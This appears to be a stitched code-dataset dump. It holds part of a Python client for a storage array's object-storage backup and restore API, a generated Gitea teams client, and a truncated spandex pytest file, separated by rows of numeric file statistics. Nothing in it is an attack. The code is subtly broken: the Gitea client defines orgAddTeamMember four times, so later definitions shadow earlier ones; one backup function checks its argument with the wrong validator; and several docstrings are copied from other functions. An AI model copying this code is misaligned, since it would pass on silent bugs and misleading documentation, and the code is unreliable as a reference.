:type ros_destination_id: str
:param ros_destination_id: The remote object storage destination 'name'
value as returned by get_all_ros_destinations. For example:
'obsdst-00000001'. Required.
:type start: int
:param start: The offset to start displaying remote object storage
restore jobs from. Optional.
:type: limit: int
:param limit: The maximum number of remote object storage restore jobs to
return. Optional.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
path = '/api/object_storage_destinations/{0}/restore_jobs.json' \
.format(ros_destination_id)
parameters = verify_start_limit(start, limit)
return session.get_api(path=path, parameters=parameters,
return_type=return_type, **kwargs)
def get_all_ros_backup_jobs(session, start=None, limit=None,
return_type=None, **kwargs):
"""
Retrieves details for all remote object storage backup jobs configured on
the VPSA.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type start: int
:param start: The offset to start displaying remote object storage
backup jobs from. Optional.
:type: limit: int
:param limit: The maximum number of remote object storage backup jobs to
return. Optional.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
path = '/api/object_storage_backup_jobs.json'
parameters = verify_start_limit(start, limit)
return session.get_api(path=path, parameters=parameters,
return_type=return_type, **kwargs)
def get_ros_backup_job(session, ros_backup_job_id, return_type=None, **kwargs):
"""
Retrieves details a single remote object storage backup job.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_backup_job_id: str
:param ros_backup_job_id: The remote object storage backup job 'name'
value as returned by get_all_ros_backup_jobs. For example:
'bkpjobs-00000001'. Required.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_backup_job_id(ros_backup_job_id)
path = '/api/object_storage_backup_jobs/{0}.json' \
.format(ros_backup_job_id)
return session.get_api(path=path, return_type=return_type, **kwargs)
def create_ros_backup_job(session, display_name, ros_destination_id, sse,
volume_id, policy_id, compression='YES',
return_type=None, **kwargs):
"""
Creates a new remote object storage backup job. Backups are based on
snapshots taken by the specified snapshot policy.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type display_name: str
:param display_name: A text label to assign to the remote object storage
backup job. For example: 'Daily S3 Backup'. May not contain a single
quote (') character. Required.
:type sse: str
:param sse: The remote object storage destination SSE:
'NO', 'AES256', 'KMS', 'KMSKEYID Required.
:type ros_destination_id: str
:param ros_destination_id: The remote object storage destination 'name'
value as returned by get_all_ros_destinations. For example:
'obsdst-00000001'. Required.
:type volume_id: str
:param volume_id: The volume 'name' value as returned by get_all_volumes
for the volume to be backed up. For example: 'volume-00000001'.
Required.
:type policy_id: str
:param policy_id: The snapshot policy 'name' value as returned by
get_all_snapshot_policies. For example: 'policy-00000001'. This
policy will determine the frequency and retention of backups for this
job. Required.
:type compression: str
:param compression: If set to 'YES', backup data will be compressed in
flight. If 'NO', backup data will not be compressed. Set to 'YES' by
default. Optional.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
display_name = verify_field(display_name, "display_name")
verify_ros_destination_id(ros_destination_id)
verify_volume_id(volume_id)
verify_policy_id(policy_id)
body_values = {'name': display_name, 'destination': ros_destination_id,
'volume': volume_id, 'policy': policy_id,
'sse': sse,
'compression': verify_boolean(compression, "compression")}
path = '/api/object_storage_backup_jobs.json'
return session.post_api(path=path, body=body_values,
return_type=return_type, **kwargs)
def pause_ros_backup_job(session, ros_backup_job_id, return_type=None,
**kwargs):
"""
Pauses a remote object storage backup job.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_backup_job_id: str
:param ros_backup_job_id: The remote object storage backup job 'name'
value as returned by get_all_ros_backup_jobs. For example:
'bkpjobs-00000001'. Required.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_destination_id(ros_backup_job_id)
path = '/api/object_storage_backup_jobs/{0}/pause.json' \
.format(ros_backup_job_id)
return session.post_api(path=path, return_type=return_type, **kwargs)
def resume_ros_backup_job(session, ros_backup_job_id, return_type=None,
**kwargs):
"""
Resumes a paused remote object storage backup job.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_backup_job_id: str
:param ros_backup_job_id: The remote object storage backup job 'name'
value as returned by get_all_ros_backup_jobs. For example:
'bkpjobs-00000001'. Required.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_backup_job_id(ros_backup_job_id)
path = '/api/object_storage_backup_jobs/{0}/continue.json' \
.format(ros_backup_job_id)
return session.post_api(path=path, return_type=return_type, **kwargs)
def break_ros_backup_job(session, ros_backup_job_id, purge_data,
delete_snapshots, return_type=None, **kwargs):
"""
Breaks a remote object storage backup job. This action is irreversible.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_backup_job_id: str
:param ros_backup_job_id: The remote object storage backup job 'name'
value as returned by get_all_ros_backup_jobs. For example:
'bkpjobs-00000001'. Required.
:type purge_data: str
:param purge_data: If set to 'YES', all data related to this backup job
will be deleted on the remote object storage destination endpoint. If
'NO', the data will remain on the endpoint. Required.
:type delete_snapshots: str
:param delete_snapshots: If set to 'YES', all snapshots created by the
specified policy will be deleted. If 'NO', they won't. Required.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_backup_job_id(ros_backup_job_id)
body_values = {'purge_data': verify_boolean(purge_data, "purge_data"),
"delete_snapshots": verify_boolean(delete_snapshots,
"delete_snapshots")}
path = '/api/object_storage_backup_jobs/{0}/break.json' \
.format(ros_backup_job_id)
return session.post_api(path=path, body=body_values,
return_type=return_type, **kwargs)
def update_ros_backup_job_compression(session, ros_backup_job_id, compression,
return_type=None, **kwargs):
"""
Updates the compression setting for a remote object storage backup job.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_backup_job_id: str
:param ros_backup_job_id: The remote object storage backup job 'name'
value as returned by get_all_ros_backup_jobs. For example:
'bkpjobs-00000001'. Required.
:type compression: str
:param compression: If set to 'YES', backup data will be compressed in
flight. If 'NO', backup data will not be compressed. Set to 'YES' by
default. Optional.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_backup_job_id(ros_backup_job_id)
body_values = {'compression': verify_boolean(compression, 'compression')}
path = '/api/object_storage_backup_jobs/{0}/compression.json' \
.format(ros_backup_job_id)
return session.post_api(path=path, body=body_values,
return_type=return_type, **kwargs)
def replace_ros_backup_job_snapshot_policy(session, ros_backup_job_id,
policy_id, return_type=None,
**kwargs):
"""
Replaces the existing snapshot policy used for a remote object storage
backup job with the specified policy.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_backup_job_id: str
:param ros_backup_job_id: The remote object storage backup job 'name'
value as returned by get_all_ros_backup_jobs. For example:
'bkpjobs-00000001'. Required.
:type policy_id: str
:param policy_id: The snapshot policy 'name' value as returned by
get_all_snapshot_policies. For example: 'policy-00000001'. This
policy will determine the frequency and retention of backups for this
job. Required.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_backup_job_id(ros_backup_job_id)
verify_policy_id(policy_id)
body_values = {'policyname': policy_id}
path = '/api/object_storage_backup_jobs/{0}/replace_snapshot_policy.json' \
.format(ros_backup_job_id)
return session.post_api(path=path, body=body_values,
return_type=return_type, **kwargs)
def get_all_ros_restore_jobs(session, start=None, limit=None,
return_type=None, **kwargs):
"""
Retrieves details for all remote object storage restore jobs running on
the VPSA.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type start: int
:param start: The offset to start displaying remote object storage
restore jobs from. Optional.
:type: limit: int
:param limit: The maximum number of remote object storage restore jobs to
return. Optional.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
parameters = verify_start_limit(start, limit)
path = '/api/object_storage_restore_jobs.json'
return session.get_api(path=path, parameters=parameters,
return_type=return_type, **kwargs)
def get_ros_restore_job(session, ros_restore_job_id, return_type=None,
**kwargs):
"""
Retrieves details a single remote object storage restore job.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_restore_job_id: str
:param ros_restore_job_id: The remote object storage restore job 'name'
value as returned by get_all_ros_restore_jobs. For example:
'rstjobs-00000001'. Required.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_restore_job_id(ros_restore_job_id)
path = '/api/object_storage_restore_jobs/{0}.json' \
.format(ros_restore_job_id)
return session.get_api(path=path, return_type=return_type, **kwargs)
def create_ros_restore_job(session, display_name, ros_destination_id, pool_id,
restore_mode, volume_name, local_snapshot_id,
object_store_key, crypt, dedupe='NO', compress='NO',
return_type=None, **kwargs):
"""
Creates a new remote object storage backup job. Backups are based on
snapshots taken by the specified snapshot policy.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type display_name: str
:param display_name: A text label to assign to the remote object storage
restore job. For example: 'PDF archive restore'. May not contain a
single quote (') character. Required.
:type ros_destination_id: str
:param ros_destination_id: The remote object storage destination 'name'
value as returned by get_all_ros_destinations for the destination
where the snapshot is stored. For example: 'obsdst-00000001'.
Required.
:type pool_id: str
:param pool_id: The pool 'name' value as returned by get_all_pools where
the snapshot will be restored. For example: 'pool-00000001'. The
volume will be created on this pool. Required.
:type restore_mode: str
:param restore_mode: This parameter expects one of three values:
'restore', 'clone', or 'import_seed'. When set to 'restore', the
volume can be immediately attached to servers; data is retrieved from
object storage on demand and in a background process; and all data
will eventually be restored. When set to 'clone', the volume can be
immediately attached to servers; and starting with zero capacity, data
is retrieved from object storage only on-demand when accessed by the
attached servers. When set to 'import_seed', a full capacity clone is
created, including snapshot time-stamping; The volume can be attached
to servers only after the volume's data was fully retrieved from
object storage; use this mode to import initial data seed for remote
mirroring. Required.
:type volume_name: str
:param volume_name: A text label to assign to the restored volume. For
example: 'pdf-files'. May not contain a single quote (') character.
Required.
:type local_snapshot_id: str
:param local_snapshot_id: Either this or object_store_key is required.
If using local_snapshot_id, the desired snapshot 'name' is passed as
returned by get_all_snapshots (with the ros_backup_job_id specified).
For example: 'snap-00000001'. Optional.
:type object_store_key: str
:param object_store_key: Either this or local_snapshot_id is required. If
using object_store_key, this is the full object storage key for the
"path" to the individual snapshot to be restored. For example:
"cloud1.C97E9A00ADE7489BB08A9AB3B0B6484F/myvpsa.vsa-00000169/
myvol.volume-00000011/2015-07-01T09:26:01+0000_snap-0000003e/". This
is useful when there is no local_snapshot_id to reference; for
example, if the snapshot is being restored to a different VPSA than
the original source. Optional.
:type crypt: str
:param crypt: If set to 'YES', the resulting volume of the restoration
will be encrypted with the VPSA's encryption key. If 'NO', the
resulting volume will not be encrypted. Required.
:type dedupe: str
:param dedupe: If set to 'YES', deduplication will be enabled on the
volume. If 'NO', it won't. Optional.
:type compress: str
:param compress: If set to 'YES', compression will be enabled on the
volume. If 'NO', it won't. Optional.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_destination_id(ros_destination_id)
verify_pool_id(pool_id)
verify_restore_mode(restore_mode)
body_values = {'name': verify_field(display_name, "display_name"),
'remote_object_store': ros_destination_id,
'poolname': pool_id, 'mode': restore_mode,
'volname': verify_field(volume_name, "volume"),
'crypt': verify_boolean(crypt, "crypt")}
if local_snapshot_id is None and object_store_key is None:
raise ValueError('Either "local_snapshot_id" or "object_store_key" '
'needs to be passed as a parameter.')
if local_snapshot_id is not None:
verify_snapshot_id(local_snapshot_id)
body_values['local_snapname'] = local_snapshot_id
if object_store_key is not None:
body_values['key'] = verify_field(object_store_key, "object_store_key")
if dedupe is not None:
body_values["dedupe"] = verify_boolean(dedupe, 'dedupe')
if compress is not None:
body_values["compress"] = verify_boolean(compress, 'compress')
path = '/api/object_storage_restore_jobs.json'
return session.post_api(path=path, body=body_values,
return_type=return_type, **kwargs)
def pause_ros_restore_job(session, ros_restore_job_id, return_type=None,
**kwargs):
"""
Pauses a remote object storage restore job.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_restore_job_id: str
:param ros_restore_job_id: The remote object storage restore job 'name'
value as returned by get_all_ros_restore_jobs. For example:
'rstjobs-00000001'. Required.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_restore_job_id(ros_restore_job_id)
path = '/api/object_storage_restore_jobs/{0}/pause.json' \
.format(ros_restore_job_id)
return session.post_api(path=path, return_type=return_type, **kwargs)
def resume_ros_restore_job(session, ros_restore_job_id, return_type=None,
**kwargs):
"""
Resumes a paused remote object storage restore job.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_restore_job_id: str
:param ros_restore_job_id: The remote object storage restore job 'name'
value as returned by get_all_ros_restore_jobs. For example:
'rstjobs-00000001'. Required.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_restore_job_id(ros_restore_job_id)
path = '/api/object_storage_restore_jobs/{0}/continue.json' \
.format(ros_restore_job_id)
return session.post_api(path=path, return_type=return_type, **kwargs)
def break_ros_restore_job(session, ros_restore_job_id, return_type=None,
**kwargs):
"""
Breaks a remote object storage restore job. This action is irreversible.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_restore_job_id: str
:param ros_restore_job_id: The remote object storage restore job 'name'
value as returned by get_all_ros_restore_jobs. For example:
'rstjobs-00000001'. Required.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_restore_job_id(ros_restore_job_id)
path = '/api/object_storage_restore_jobs/{0}/break.json' \
.format(ros_restore_job_id)
return session.post_api(path=path, return_type=return_type, **kwargs)
def change_ros_restore_job_mode(session, ros_restore_job_id, restore_mode,
return_type=None, **kwargs):
"""
If the given remote object storage restore job is currently in "clone"
mode, it can be changed to "restore" mode, or vice-versa.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_restore_job_id: str
:param ros_restore_job_id: The remote object storage restore job 'name'
value as returned by get_all_ros_restore_jobs. For example:
'rstjobs-00000001'. Required.
:type restore_mode: str
:param restore_mode: See documentation for create_ros_restore_job. Only
"clone" and "restore" are valid values. Required.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_restore_job_id(ros_restore_job_id)
verify_restore_job_mode(restore_mode)
verify_restore_mode(restore_mode)
body_values = {'mode': restore_mode}
path = '/api/object_storage_restore_jobs/{0}/switch_mode.json' \
.format(ros_restore_job_id)
return session.post_api(path=path, body=body_values,
return_type=return_type, **kwargs)
def get_ros_backup_job_performance(session, ros_backup_job_id, interval=1,
return_type=None, **kwargs):
"""
Retrieves metering statistics for the remote object storage backup job for
the specified interval. Default interval is one second.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_backup_job_id: str
:param ros_backup_job_id: The remote object storage backup job 'name'
value as returned by get_all_ros_backup_jobs. For example:
'bkpjobs-00000001'. Required.
:type interval: int
:param interval: The interval to collect statistics for, in seconds.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_backup_job_id(ros_backup_job_id)
interval = verify_interval(interval)
path = '/api/object_storage_backup_jobs/{0}/performance.json' \
.format(ros_backup_job_id)
parameters = {'interval': interval}
return session.get_api(path=path, parameters=parameters,
return_type=return_type, **kwargs)
def get_ros_restore_job_performance(session, ros_restore_job_id, interval=1,
return_type=None, **kwargs):
"""
Retrieves metering statistics for the remote object storage restore job
for the specified interval. Default interval is one second.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_restore_job_id: str
:param ros_restore_job_id: The remote object storage restore job 'name'
value as returned by get_all_ros_restore_jobs. For example:
'rstjobs-00000001'. Required.
:type interval: int
:param interval: The interval to collect statistics for, in seconds.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_restore_job_id(ros_restore_job_id)
interval = verify_interval(interval)
path = '/api/object_storage_restore_jobs/{0}/performance.json' \
.format(ros_restore_job_id)
parameters = {'interval': interval}
return session.get_api(path=path, parameters=parameters,
return_type=return_type, **kwargs)
def backup_jobs_rate_limit(session, ros_backup_job_id, limit,
return_type=None, **kwargs):
"""
Retrieves metering statistics for the remote object storage restore job
for the specified interval. Default interval is one second.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_backup_job_id: str
:param ros_backup_job_id: The remote object storage backup job 'name'
value as returned by get_all_ros_backup_jobs. For example:
'bckjobs-00000001'. Required.
:type limit: int
:param limit: Limit rate
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
path = "/api/object_storage_backup_jobs/{0}/rate_limit.json".format(
ros_backup_job_id)
body_values = {"limit": limit}
return session.post_api(path=path, body=body_values,
return_type=return_type, **kwargs)
def backup_jobs_update_compression(session, ros_backup_job_id, compression,
return_type=None, **kwargs):
"""
Retrieves metering statistics for the remote object storage restore job
for the specified interval. Default interval is one second.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_backup_job_id: str
:param ros_backup_job_id: The remote object storage backup job 'name'
value as returned by get_all_ros_backup_jobs. For example:
'bkpjobs-00000001'. Required.
:type compression: str
:param compression: If set to 'YES', backup data will be compressed in
flight. If 'NO', backup data will not be compressed. Set to 'YES' by
default. Optional.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
# POST /api/object_storage_backup_jobs/{id}/compression.json
path = "/api/object_storage_backup_jobs/{0}/compression.json".format(
ros_backup_job_id)
body_values = {"compression": compression}
return session.post_api(path=path, body=body_values,
return_type=return_type, **kwargs)
| 39.886002
| 79
| 0.683675
| 6,318
| 47,584
| 4.96692
| 0.059987
| 0.049712
| 0.027341
| 0.02817
| 0.826232
| 0.788758
| 0.769765
| 0.743826
| 0.714031
| 0.693923
| 0
| 0.008742
| 0.245124
| 47,584
| 1,192
| 80
| 39.919463
| 0.864894
| 0.612685
| 0
| 0.551095
| 0
| 0
| 0.136865
| 0.078163
| 0
| 0
| 0
| 0
| 0
| 1
| 0.094891
| false
| 0.062044
| 0.00365
| 0
| 0.193431
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
67da3e2f0060615cd7645759b7475494b930e4a6
| 5,801
|
py
|
Python
|
sandbox/lib/jumpscale/JumpscaleLibs/clients/gitea/client/teams_service.py
|
threefoldtech/threebot_prebuilt
|
1f0e1c65c14cef079cd80f73927d7c8318755c48
|
[
"Apache-2.0"
] | 2
|
2019-05-09T07:21:25.000Z
|
2019-08-05T06:37:53.000Z
|
sandbox/lib/jumpscale/JumpscaleLibs/clients/gitea/client/teams_service.py
|
threefoldtech/threebot_prebuilt
|
1f0e1c65c14cef079cd80f73927d7c8318755c48
|
[
"Apache-2.0"
] | 664
|
2018-12-19T12:43:44.000Z
|
2019-08-23T04:24:42.000Z
|
Jumpscale/clients/gitea/client/teams_service.py
|
threefoldtech/jumpscale10
|
5fb073a82aeb0e66fc7d9660c45a1e31bc094bfa
|
[
"Apache-2.0"
] | 7
|
2019-05-03T07:14:37.000Z
|
2019-08-05T12:36:52.000Z
|
# DO NOT EDIT THIS FILE. This file will be overwritten when re-running go-raml.
from .Repository import Repository
from .Team import Team
from .User import User
from .unhandled_api_error import UnhandledAPIError
from .unmarshall_error import UnmarshallError
class TeamsService:
def __init__(self, client):
pass
self.client = client
def orgAddTeamMember(self, username, id, headers=None, query_params=None, content_type="application/json"):
"""
Remove a team member
It is method for DELETE /teams/{id}/members/{username}
"""
uri = self.client.base_url + "/teams/" + id + "/members/" + username
return self.client.delete(uri, None, headers, query_params, content_type)
def orgAddTeamMember(self, data, username, id, headers=None, query_params=None, content_type="application/json"):
"""
Add a team member
It is method for PUT /teams/{id}/members/{username}
"""
uri = self.client.base_url + "/teams/" + id + "/members/" + username
return self.client.put(uri, data, headers, query_params, content_type)
def orgListTeamMembers(self, id, headers=None, query_params=None, content_type="application/json"):
"""
List a team's members
It is method for GET /teams/{id}/members
"""
uri = self.client.base_url + "/teams/" + id + "/members"
resp = self.client.get(uri, None, headers, query_params, content_type)
try:
if resp.status_code == 200:
resps = []
for elem in resp.json():
resps.append(User(elem))
return resps, resp
message = "unknown status code={}".format(resp.status_code)
raise UnhandledAPIError(response=resp, code=resp.status_code, message=message)
except ValueError as msg:
raise UnmarshallError(resp, msg)
except UnhandledAPIError as uae:
raise uae
except Exception as e:
raise UnmarshallError(resp, e.message)
def orgAddTeamMember(self, org, repo, id, headers=None, query_params=None, content_type="application/json"):
"""
This does not delete the repository, it only removes the repository from the team.
It is method for DELETE /teams/{id}/repos/{org}/{repo}
"""
uri = self.client.base_url + "/teams/" + id + "/repos/" + org + "/" + repo
return self.client.delete(uri, None, headers, query_params, content_type)
def orgAddTeamMember(self, data, org, repo, id, headers=None, query_params=None, content_type="application/json"):
"""
Add a repository to a team
It is method for PUT /teams/{id}/repos/{org}/{repo}
"""
uri = self.client.base_url + "/teams/" + id + "/repos/" + org + "/" + repo
return self.client.put(uri, data, headers, query_params, content_type)
def orgListTeamRepos(self, id, headers=None, query_params=None, content_type="application/json"):
"""
List a team's repos
It is method for GET /teams/{id}/repos
"""
uri = self.client.base_url + "/teams/" + id + "/repos"
resp = self.client.get(uri, None, headers, query_params, content_type)
try:
if resp.status_code == 200:
resps = []
for elem in resp.json():
resps.append(Repository(elem))
return resps, resp
message = "unknown status code={}".format(resp.status_code)
raise UnhandledAPIError(response=resp, code=resp.status_code, message=message)
except ValueError as msg:
raise UnmarshallError(resp, msg)
except UnhandledAPIError as uae:
raise uae
except Exception as e:
raise UnmarshallError(resp, e.message)
def orgDeleteTeam(self, id, headers=None, query_params=None, content_type="application/json"):
"""
Delete a team
It is method for DELETE /teams/{id}
"""
uri = self.client.base_url + "/teams/" + id
return self.client.delete(uri, None, headers, query_params, content_type)
def orgGetTeam(self, id, headers=None, query_params=None, content_type="application/json"):
"""
Get a team
It is method for GET /teams/{id}
"""
uri = self.client.base_url + "/teams/" + id
resp = self.client.get(uri, None, headers, query_params, content_type)
try:
if resp.status_code == 200:
return Team(resp.json()), resp
message = "unknown status code={}".format(resp.status_code)
raise UnhandledAPIError(response=resp, code=resp.status_code, message=message)
except ValueError as msg:
raise UnmarshallError(resp, msg)
except UnhandledAPIError as uae:
raise uae
except Exception as e:
raise UnmarshallError(resp, e.message)
def orgEditTeam(self, data, id, headers=None, query_params=None, content_type="application/json"):
"""
Edit a team
It is method for PATCH /teams/{id}
"""
uri = self.client.base_url + "/teams/" + id
resp = self.client.patch(uri, data, headers, query_params, content_type)
try:
if resp.status_code == 200:
return Team(resp.json()), resp
message = "unknown status code={}".format(resp.status_code)
raise UnhandledAPIError(response=resp, code=resp.status_code, message=message)
except ValueError as msg:
raise UnmarshallError(resp, msg)
except UnhandledAPIError as uae:
raise uae
except Exception as e:
raise UnmarshallError(resp, e.message)
| 41.733813
| 118
| 0.611619
| 694
| 5,801
| 5.020173
| 0.14121
| 0.057405
| 0.04822
| 0.046498
| 0.849024
| 0.849024
| 0.8407
| 0.80023
| 0.768083
| 0.758324
| 0
| 0.002872
| 0.279779
| 5,801
| 138
| 119
| 42.036232
| 0.83102
| 0.121358
| 0
| 0.732558
| 1
| 0
| 0.071206
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116279
| false
| 0.011628
| 0.05814
| 0
| 0.290698
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
67df25abf8299bcac0581594bc887fbdde4c3e8a
| 22,238
|
py
|
Python
|
spandex/targets/tests/test_synthesis.py
|
UDST/spandex
|
2f485b190d521bc84e9a66d71c8161b5214570d8
|
[
"BSD-3-Clause"
] | 21
|
2015-09-24T08:20:13.000Z
|
2020-08-10T16:15:03.000Z
|
spandex/targets/tests/test_synthesis.py
|
UDST/spandex
|
2f485b190d521bc84e9a66d71c8161b5214570d8
|
[
"BSD-3-Clause"
] | 3
|
2018-05-22T21:04:48.000Z
|
2018-05-30T20:40:44.000Z
|
spandex/targets/tests/test_synthesis.py
|
UDST/spandex
|
2f485b190d521bc84e9a66d71c8161b5214570d8
|
[
"BSD-3-Clause"
] | 14
|
2015-09-21T17:59:02.000Z
|
2020-05-06T05:12:40.000Z
|
import numpy as np
import pandas as pd
import pandas.util.testing as pdt
import pytest
from spandex.targets import synthesis as syn
@pytest.fixture
def seed(request):
current = np.random.get_state()
def fin():
np.random.set_state(current)
request.addfinalizer(fin)
np.random.seed(0)
@pytest.fixture(scope='module')
def alloc_id():
return 'thing_id'
@pytest.fixture(scope='module')
def count():
return 'number'
@pytest.fixture(scope='module')
def df(alloc_id, count):
return pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c'],
count: [1, 2, 3, 4, 5]})
@pytest.fixture(scope='module')
def constraint():
return pd.Series([0, 1, 3], index=['a', 'b', 'c'])
@pytest.fixture(scope='module')
def constraint_units():
return 'units'
@pytest.fixture(scope='module')
def constraint_scaled():
return 'scaled'
@pytest.fixture(scope='module')
def constraint_scale_factor():
return 400
@pytest.fixture(scope='module')
def constraint_df(
df, alloc_id, constraint, constraint_units, constraint_scaled,
constraint_scale_factor):
current = df[alloc_id].value_counts()
return pd.DataFrame(
{constraint_units: constraint + current,
constraint_scaled: (constraint + current) * constraint_scale_factor})
@pytest.fixture(scope='module')
def constraint_expr(constraint_scaled, constraint_scale_factor):
return '{} / {}'.format(constraint_scaled, constraint_scale_factor)
def test_allocate_rows(df, alloc_id, constraint, count):
rows = df.loc[[0, 1]]
syn._allocate_rows(rows, alloc_id, constraint)
pdt.assert_frame_equal(
rows,
pd.DataFrame(
{alloc_id: ['b', 'c'],
count: [1, 2]}))
def test_allocate_rows_stuff(df, alloc_id, constraint, count):
rows = df.copy(deep=True)
stuff = True
syn._allocate_rows(rows, alloc_id, constraint, stuff=stuff)
pdt.assert_frame_equal(
rows,
pd.DataFrame(
{alloc_id: ['b', 'c', 'c', 'c', 'a'],
count: df[count]}))
def test_allocate_rows_no_stuff(df, alloc_id, constraint, count):
rows = df.copy(deep=True)
stuff = False
syn._allocate_rows(rows, alloc_id, constraint, stuff=stuff)
pdt.assert_frame_equal(
rows,
pd.DataFrame(
